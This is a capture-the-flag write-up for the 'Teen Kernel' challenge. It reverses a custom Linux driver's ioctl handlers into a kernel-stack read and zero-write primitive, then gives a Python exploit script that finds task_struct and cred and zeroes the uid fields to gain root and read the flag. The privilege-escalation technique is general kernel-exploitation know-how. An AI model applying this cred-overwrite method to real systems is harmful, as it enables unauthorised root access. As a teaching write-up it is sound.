Teen Kernel

The challenge description was :

“The baby was cute and made sure to let you know if something is wrong. Now, the baby has grown into a teen, a stubborn one. He does not like to talk very much. Can you display some authority?”

This challenge is the continuation of the Baby kernel challenge; our solution involves knowledge from Baby kernel.

Playing around

Running the run.sh prompts the following menu:

—– Menu —–

  1. Read
  2. Write
  3. Show me my uid
  4. Read flag
  5. Any hintz?
  6. Bye!

Let’s have a look to what we have for the menu 🙂

Trying to get a hint from 5 option is not giving any clue. Trying 4 option is obviously not working either: Could not open file for reading...

Option 3 is returning our uid :

uid=1000(user) gid=1000(user) groups=1000(user)

As for options 1 (Read) and 2 (Write), they seem to be where things are getting serious. We will get back to them later.

Examining the files

zcat initramfs.cpio.gz | cpio -idmv to extract the initramfs.

> ls:

bin client_kernel_kid etc flag home init lib proc root sys usr var

Note the flag file that is certainly belonging to root.

Let’s open the init file:

#!/bin/busybox sh
# /bin/sysinfo

...

...

insmod "/lib/modules/$(uname -r)/kernel_kid.ko"
chmod +rw /dev/flux_kid
chmod +x /client_kernel_kid

sleep 2

su user -c /client_kernel_kid

...

Let’s ls the /lib/modules directory to discover the kernel version: 5.3.5.

We see there is a custom kernel driver kernel_kid.ko whose file system anchor is /dev/flux_kid.

We see that the init process resolves to be the client_kernel_kid process run as user user which is exactly what we are seeing when printing our uid:

uid=1000(user) gid=1000(user) groups=1000(user)

Decompiling the client_kernel_kid binary (with ghidra) and getting to the menu function gives the following:

  1 
  2 int menu_function(void)
  3 
  4 {
  5   int user_choice;
  6   ulong flux_fd;
  7 
  8   FUN_00401d8b();
  9   flux_fd._0_4_ = open_flux_driver(PTR_s__dev_flux_kid_004ca100,0);
 10   if ((int)flux_fd == -1) {
 11     output_string("Mh?\n");
 12   }
 13   print_menu();
 14   user_choice = get_user_selection();
 15   switch(user_choice) {
 16   default:
 17     output_string("You are not making any sense...");
 18     close_flux_fd((int)flux_fd);
 19     return 0;
 20   case 1:
 21     handle_read((int)flux_fd);
 22     break;
 23   case 2:
 24     handle_write((int)flux_fd);
 25     break;
 26   case 3:
 27     handle_getuid("id");
 28     break;
 29   case 4:
 30                     /* 4. Read The Flag */
 31     The_Flag_Func();
 32     break;
 33   case 5:
 34     FUN_004020b1();
 35     break;
 36   case 6:
 37     close_flux_fd((int)flux_fd);
 38     output_string("Bye!");
 39     return 0;
 40   }
 41 }

Not surprising, the implementation is opening the /dev/flux_kid driver at line 9 and uses it for reading and writing.

Let’s examine the function handle_read which implements the Read option of the menu :

  1 
  2 void handle_read(int flux_fd)
  3 
  4 {
  5   long lVar1;
  6   ulong offset;
  7   long in_FS_OFFSET;
  8   ulong value;
  9 
 10   lVar1 = *(long *)(in_FS_OFFSET + 0x28);
 11   value = 0xdeadbeefdeadbeef;
 12   output_string("Sigh...\n> ");
 13   offset = get_user_selection();
 14   output_string("I hope this will not suck too much...");
 15   flux_driver_read(flux_fd,offset,&value);
 16   FUN_00409920("Alright, alright: %016lx\n",value);
 17   if (lVar1 != *(long *)(in_FS_OFFSET + 0x28)) {
 18                     /* WARNING: Subroutine does not return */
 19     check_stack_integrity();
 20   }
 21   return;
 22 }

We see that the user is prompted to enter a value, stored in variable offset ; then offset is passed to the function flux_driver_read along with an out parameter address, &value. The value is then printed to the screen. Let’s look at the flux_driver_read function:

  1 /* Added while reversing */ 
  2 struct read_arg_t {
  3     unsigned long offset;
  4     unsigned long *p_user_output_val;
  5 }read_arg_t;
  6 
  7 void flux_driver_read(int flux_fd, ulong offset, ulong *p_out_value)
  8 
  9 {
 10   long lVar1;
 11   long in_FS_OFFSET;
 12   read_arg_t arg;
 13   
 14   lVar1 = *(long *)(in_FS_OFFSET + 0x28);
 15   arg.offset = offset;
 16   arg.p_user_output_val = p_out_value;
 17   invoke_flux_ioctl(flux_fd,0x385,&arg);
 18   if (lVar1 != *(long *)(in_FS_OFFSET + 0x28)) {
 19                     /* WARNING: Subroutine does not return */
 20     check_stack_integrity();
 21   }
 22   return;
 23 } 

This function is basically bundling the offset and the value address into a struct read_arg_t and passes it to invoke_flux_ioctl along with the driver file descriptor and a number, 0x385.

Looking at the assembly of invoke_flux_ioctl:

   int __stdcall invoke_flux_ioctl(int fd, ulong req, ...)

        004501f0 f3 0f 1e fa     ENDBR64
        004501f4 b8 10 00        MOV        EAX,0x10
                 00 00
        004501f9 0f 05           SYSCALL
        004501fb 48 3d 01        CMP        RAX,0xfffff001
                 f0 ff ff
        00450201 73 01           JNC        LAB_00450204
        00450203 c3              RET

We see that 0x10 is stored in eax and the syscall instruction is invoked. 0x10 is __NR_ioctl, so no doubt, the ioctl operation of the driver is invoked here with request number0x385 and the argument structure address.

Now moving to the Write option of the menu, implemented by the handle_write function:

  1 
  2 void handle_write(int flux_fd)
  3 
  4 {
  5   ulong offset;
  6   longlong val;
  7   
  8   output_string("Oh really...?\n> ");
  9   offset = get_user_selection();
 10   if (offset < 0x10000) {
 11     output_string("Sorry, I am not in for that kind of an adventure...");
 12   }
 13   else {
 14     output_string("What is that all about?\n> ");
 15     val = get_user_selection();
 16     output_string("Please no...");
 17     flux_driver_write(flux_fd,offset,val);
 18     output_string("I cannot believe this.");
 19   }
 20   return;
 21 }

Similarly to the handle_read function, the user input is stored in offset . This time, offset has to be higher or equal to 0x10000 to proceed any further. Once we passed this check, the user is prompted again to enter another value, stored in val. Eventually, offset and val are passed as parameters to the function flux_driver_write which invokes the driver with request 0x386 via invoke_flux_ioctl as in the Read option.

  1 
  2 void flux_driver_write(int fd,ulong offset,ulong val)
  3 
  4 {
  5   long lVar1;
  6   long in_FS_OFFSET;
  7   ulong __offset;
  8   
  9   lVar1 = *(long *)(in_FS_OFFSET + 0x28);
 10   __offset = offset;
 11   invoke_flux_ioctl(fd,0x386,&__offset);
 12   if (lVar1 != *(long *)(in_FS_OFFSET + 0x28)) {
 13                     /* WARNING: Subroutine does not return */
 14     check_stack_integrity();
 15   }
 16   return;
 17 }

We see that nothing is done with the val variable which means its value is not important.

The driver

At this stage, ghidra did not do very well at decompiling the driver, so we moved to use IDA.

Looking into the driver we have the following ioctl implementation:

  1 _int64 __fastcall driver_ioctl(__int64 a1, int req, __int64 value)
  2 {
  3   __int64 result; // rax@4
  4 
  5   if ( req == 0x385 )
  6   {
  7     read(value);
  8     result = 0LL;
  9   }
 10   else
 11   {
 12     if ( req == 0x386 )
 13       write(value);
 14     result = 0LL;
 15   }
 16   return result;
 17 }

We recognize the request value 0x385 for read and 0x386 for write.

The read function looks like this:

  1 __int64 __fastcall read(read_arg_t *p_arg)
  2 {
  3   __int64 result; // rax@1
  4   unsigned __int64 v2; // rt1@1
  5   __int64 output_value; // [rsp+0h] [rbp-28h]@1
  6   read_arg_t arg; // [rsp+8h] [rbp-20h]@1
  7   unsigned __int64 v5; // [rsp+18h] [rbp-10h]@1
  8 
  9   v5 = __readgsqword(0x28u);
 10   arg.offset = 0LL;
 11   arg.p_user_output_val = 0LL;
 12   output_value = 0LL;
 13   copy_from_user(&arg, p_arg, sizeof(read_arg_t));
 14   output_value = *(__int64 *)((char *)&arg.offset + arg.offset);
 15   copy_to_user(struct1.p_user_output_val, &output_value, 8LL);
 16   v2 = __readgsqword(0x28u);
 17   result = v2 ^ v5;
 18   if ( v2 == v5 )
 19     result = 0LL;
 20   return result;

The important lines are line 14 and 15 :

Line 13 : the user argument bundle is copied to local argument variable arg on the kernel stack

Line 14: the offset value that is passed by the user is added to the kernel **address ** of arg i.e. &arg. The resulting address is dereferenced and copied back to the user at line 15. This is equivalent semantically to:

char *p = (char *)&arg;
output_value = p[arg.offset]

This makes clear that the read function actually gives a read that is relative to the address of arg on the kernel stack.

We can experiment for instance with offset 40:

----- Menu -----
1. Read
2. Write
3. Show me my uid
4. Read flag
5. Any hintz?
6. Bye!
> 1
Sigh...
> 
40
I hope this will not suck too much...
Alright, alright: ffffffffc01d41a3

Let’s try with 505:

----- Menu -----
1. Read
2. Write
3. Show me my uid
4. Read flag
5. Any hintz?
6. Bye!
> 1  
Sigh...
> 
505
I hope this will not suck too much...

This time the kernel crashed. The instruction that crashes is probably the copy_from_user: we copy 16 bytes, if we add the first 8 bytes to 505 we obtain 513 which 1 byte passed 512 (0x200). In other word, we apparently hit one end of the kernel stack.

As for the write function:

 1 __int64 __fastcall write(__int64 user_value)
  2 {
  3   __int64 result; // rax@1
  4   unsigned __int64 v2; // rt1@1
  5   __int64 kernel_value; // [rsp+0h] [rbp-20h]@1
  6   __int64 zero; // [rsp+8h] [rbp-18h]@1
  7   unsigned __int64 v5; // [rsp+10h] [rbp-10h]@1
  8 
  9   v5 = __readgsqword(0x28u);
 10   kernel_value = 0LL;
 11   zero = 0LL;
 12   copy_from_user(&kernel_value, user_value, 16LL);
 13   *(__int64 *)((char *)&kernel_value + kernel_value) = zero;
 14   v2 = __readgsqword(0x28u);
 15   result = v2 ^ v5;
 16   if ( v2 == v5 )
 17     result = 0LL;
 18   return result;

Pretty much the same logic that in the read function: the user input is interpreted as an offset that is added to a reference kernel address on the stack and a zero is written at the resulting address:

*(__int64 *)((char *)&kernel_value + kernel_value) = zero;

So to conclude, we have a read primitive that provides a relative read on the kernel stack based on an offset passed by the user and a write primitive that provides a relative zero write on the kernel stack, using a user offset as well.

Exploitation

The plan is the following:

  1. Using the read primitive, find the address of the task_struct of the current process,
  2. Using the read primitive, find the address of the cred,
  3. Using the write primitive, overwrite all the uids and gid with in the cred with 0,
  4. Invoke the “Read flag” option in the menu as root

Since we write relatively to arg, we first need to find its address , &arg . In order to understand why, let’s looking again at the line that is actually getting the value from the stack:

 14   output_value = *(__int64 *)((char *)&arg.offset + arg.offset);

The only input we have is arg.offset . Suppose we want to read the value at kernel address kaddr, we could achieve this by passing the offset kaddr - &arg.offset. Then the above expression resolves to:

14    output_value = *(__int64 *)((char *)&arg.offset + kaddr - &arg.offset);

Or in other word:

output_value = *(__int64 *)((char *)kaddr)

Which is exactly what we want.

To determine &arg, we first need to find an address on the stack. We can use kernel stack addresses we know from the Baby kernel riddle to know how a stack address looks like or alternatively, we could search for kernel addresses that look like linked list addresses of stack frame (the difference between two values is less than a page and the alignment matches). We find such an address at offset 0x120, let’s call it x.

Now we use the fact that offset 0x200 hits one end of the stack to find &arg. First find the page address of x : page_address = x & ~0xfff and then take as assumption that the crash happened at the page boundary, we have &args + 0x200 = page_address + 0x1000

Thus,

&args = page_address + 0x1000 - 0x200 = page_address + 0xe00

Let’s start coding a python script:

#Python script

x = read_value_at(0x120)
arg_addr = (x & ~0xfff) + 0xe00

We next find the task_struct address based on our knowledge of how a task_struct address looks like in the Baby kernel riddle. We find it at offset 0xf0.

task_struct = read_value_at(0xf0)

Now moving to find the cred pointer.

We know that the cred pointer in task_struct should appear twice with the same value (real_cred and cred), not pointing inside the task_struct. Note that this kernel has randomized layout (see the end of the definition) ,meaning that the fields real_cred and cred are not necessarily sequentially ordered. With thus need to search within a sufficient large range.

111 struct cred {
112     atomic_t    usage;
113 #ifdef CONFIG_DEBUG_CREDENTIALS
114     atomic_t    subscribers;    /* number of processes subscribed */
115     void        *put_addr;
116     unsigned    magic;
117 #define CRED_MAGIC  0x43736564
118 #define CRED_MAGIC_DEAD 0x44656144
119 #endif
120     kuid_t      uid;        /* real UID of the task */
121     kgid_t      gid;        /* real GID of the task */
122     kuid_t      suid;       /* saved UID of the task */
123     kgid_t      sgid;       /* saved GID of the task */
124     kuid_t      euid;       /* effective UID of the task */
125     kgid_t      egid;       /* effective GID of the task */
126     kuid_t      fsuid;      /* UID for VFS ops */
127     kgid_t      fsgid;      /* GID for VFS ops */
128     unsigned    securebits; /* SUID-less security management */
129     kernel_cap_t    cap_inheritable; /* caps our children can inherit */
130     kernel_cap_t    cap_permitted;  /* caps we're permitted */
131     kernel_cap_t    cap_effective;  /* caps we can actually use */
132     kernel_cap_t    cap_bset;   /* capability bounding set */
133     kernel_cap_t    cap_ambient;    /* Ambient capability set */
134 #ifdef CONFIG_KEYS
135     unsigned char   jit_keyring;    /* default keyring to attach requested
136                      * keys to */
137     struct key  *session_keyring; /* keyring inherited over fork */
138     struct key  *process_keyring; /* keyring private to this process */
139     struct key  *thread_keyring; /* keyring private to this thread */
140     struct key  *request_key_auth; /* assumed request_key authority */
141 #endif
142 #ifdef CONFIG_SECURITY
143     void        *security;  /* subjective LSM security */
144 #endif
145     struct user_struct *user;   /* real user ID subscription */
146     struct user_namespace *user_ns; /* user_ns the caps and keyrings are relative to. */
147     struct group_info *group_info;  /* supplementary groups for euid/fsgid */
148     /* RCU deletion */
149     union {
150         int non_rcu;            /* Can we skip RCU deletion? */
151         struct rcu_head rcu;        /* RCU deletion hook */
152     };
153 } __randomize_layout;

Using the read primitive we search within our task_struct the offset of all kernel pointers and select those that appear twice:

#Since stack_addr is the origin, we need to substract it
current_data = [read_value_at(task_struct + i - arg_addr) for i in range(0, 0xa00, 8)]

ptrs = {}

for i, pt in enumerate(current_data):
    if (pt>>48) == 0xFFFF and current_data.count(pt) == 2:
        ptrs[pt] = i

Now iterate through the cred candidates by step of 8 bytes and search for anything looking like our uid (1000) and use the write primitive to overwrite it with a 0, getting us to be root. And finally, read the flag as root.

read_uid()
for pt in ptrs.keys():
    for i in range(0, 0x100, 8):
        val = read_value_at(pt - arg_off + i)
        print("%x (%d): %x" %(pt + i, ptrs[pt], val))
        if (val >> 32 == 1000):
            write_value_at(pt - arg_off + i)

#check we are root            
read_uid()
#getting the flag
read_flag()

Note the call to write_value_at() in the script: we assumed that the stack base address from where we write is located at the same offset in the page as in the read case. This appears to be true.

In this script output, you can see that the value 1000 (uid) is found at various offsets from the address *(task_struct + 44) ; however those offsets are not consecutive: this is the effect of the randomized layout.

Let’s finally look at the script output:

stack at ffffaed3c00b3e00<br>
task_struct at ffff94f68311c800

uid=1000(user) gid=1000(user) groups=1000(user)
ffff924f4211b620 (5): ffff924f4211b620<br>
    ffff924f4211b628 (5): ffff924f4211b620<br>
    ffff924f4211b630 (5): 0<br>
    ffff924f4211b638 (5): ffff924f40071d80<br>
    ffff924f4211b640 (5): ffff924f4210d6c0<br>
    ffff924f4211b648 (5): 0<br>
    ffff924f4211b650 (5): 1<br>
    ffff924f4211b658 (5): ffff924f421184c0<br>
    ffff924f4211b660 (5): ffff924f421184c0<br>
    ffff924f4211b668 (5): bb192e36<br>
    ffff924f4211b670 (5): 0<br>
    ffff924f4211b678 (5): ffff924f4211b678<br>
    ffff924f4211b680 (5): ffff924f4211b678<br>
    ffff924f4211b688 (5): ffff924f4211b688<br>
    ffff924f4211b690 (5): 0<br>
    ffff924f4211b698 (5): 0<br>
    ffff924f4211b6a0 (5): 0<br>
    ffff924f4211b6a8 (5): 0<br>
    ffff924f4211b6b0 (5): 0<br>
    ffff924f4211b6b8 (5): 0<br>
    ffff924f4211b6c0 (5): 0<br>
    ffff924f4211b6c8 (5): 0<br>
    ffff924f4211b6d0 (5): 0<br>
    ffff924f4211b6d8 (5): 0<br>
    ffff924f4211b6e0 (5): ffff924f4211b6e0<br>
    ffff924f4211b6e8 (5): 0<br>
    ffff924f4211b6f0 (5): 0<br>
    ffff924f4211b6f8 (5): 0<br>
    ffff924f4211b700 (5): 0<br>
    ffff924f4211b708 (5): ffffffff9745f460<br>
    ffff924f4211b710 (5): ffffffff97e44740<br>
    ffff924f4211b718 (5): 0<br>
    ffff924f4210d6c0 (44): 3fffffffff<br>
    ffff924f4210d6c8 (44): ffffffff97e40ae0<br>
    ffff924f4210d6d0 (44): 0<br>
    ffff924f4210d6d8 (44): 0<br>
    ffff924f4210d6e0 (44): 43736564<br>
    ffff924f4210d6e8 (44): 3e8  <---- This 1000<br>
    ffff924f4210d6f0 (44): 0<br>
    ffff924f4210d6f8 (44): ffff924f42127b80<br>
    ffff924f4210d700 (44): ffff924f40091720<br>
    ffff924f4210d708 (44): 2<br>
    ffff924f4210d710 (44): 0<br>
    ffff924f4210d718 (44): 3e800000000<br>
    ffff924f4210d720 (44): 0<br>
    ffff924f4210d728 (44): 3000003e8<br>
    ffff924f4210d730 (44): 3e8000003e8<br>
    ffff924f4210d738 (44): 3e8000003e8<br>
    ffff924f4210d740 (44): 0<br>
    ffff924f4210d748 (44): 3e8 <----------- This 1000<br>
    ffff924f4210d750 (44): 0<br>
    ffff924f4210d758 (44): 0<br>
    ffff924f4210d760 (44): 0<br>
    ffff924f4210d768 (44): 0<br>
    ffff924f4210d770 (44): 0<br>
    ffff924f4210d778 (44): 0<br>
    ffff924f4210d780 (44): 7858641e66cbc03c<br>
    ffff924f4210d788 (44): 0<br>
    ffff924f4210d790 (44): 0<br>
    ffff924f4210d798 (44): 0<br>
    ffff924f4210d7a0 (44): 0<br>
    ffff924f4210d7a8 (44): 0<br>
    ffff924f4210d7b0 (44): 0<br>
    ffff924f4210d7b8 (44): 0

uid=0(root) gid=0(root) groups=1000(user)

   Here are your 0x23 bytes of the flag: 
   flag{why_are_y0u_not_talking_to_me}

The flag is flag{why_are_y0u_not_talking_to_me}